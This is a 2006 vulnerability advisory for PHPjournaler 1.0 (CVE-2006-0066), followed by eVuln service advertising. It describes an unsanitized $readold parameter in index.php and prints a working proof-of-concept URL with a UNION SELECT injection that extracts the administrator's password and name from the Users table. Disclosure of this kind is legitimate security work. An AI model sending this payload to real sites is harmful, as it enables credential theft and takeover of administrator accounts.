SQL Injection Vulnerability in PHPjournaler

Summary

Vulnerability
SQL Injection Vulnerability in PHPjournaler
Discovered
2006.01.01
Last Update
0 n/a
ID
EV0009
CVE
CVE-2006-0066
Risk Level
medium
Type
SQL Injection
Status
Unpatched
Vendor
n/a
Vulnerable Software
PHPjournaler (http://phpjournaler.sourceforge.net/)
Version
1.0
PoC/Exploit
Available
Solution
Not available
Discovered by
Aliaksandr Hartsuyeu (eVuln.com)

Description

SQL Injection found in PHPjournaler (http://phpjournaler.sourceforge.net/) script.

Vulnerable scripts: index.php

Variable $readold isn't properly sanitized before being used in a SQL query. This can be used to make any SQL query by injecting arbitrary SQL code.

Administrator's password is threatened.

PoC/Exploit

Show Administrator's password:
http://host/phpjournaler/index.php? readold=999%20union%20select%201,password,3,4,name,6%20from%20Users/*

Solution.

Solution for "SQL Injection Vulnerability in PHPjournaler" is not available. Check vendor's website for updates.

Order Source Code Review made by eVuln

Protect against hacking by source code audit of your website made by Aliaksandr Hartsuyeu.The work will be done by specialists in website security.

Advisories by vuln type

Website Monitoring

Daily malware scanning. Allows to receive alerts about security problems in your website.
Details >>

Malicious redirects detected?

eVuln team will eliminate the reason, clean your website and monitor it.
Details >>

Website blacklisted?

eVuln team will clean your website, discover and fix security holes, remove from blacklists.
Details >>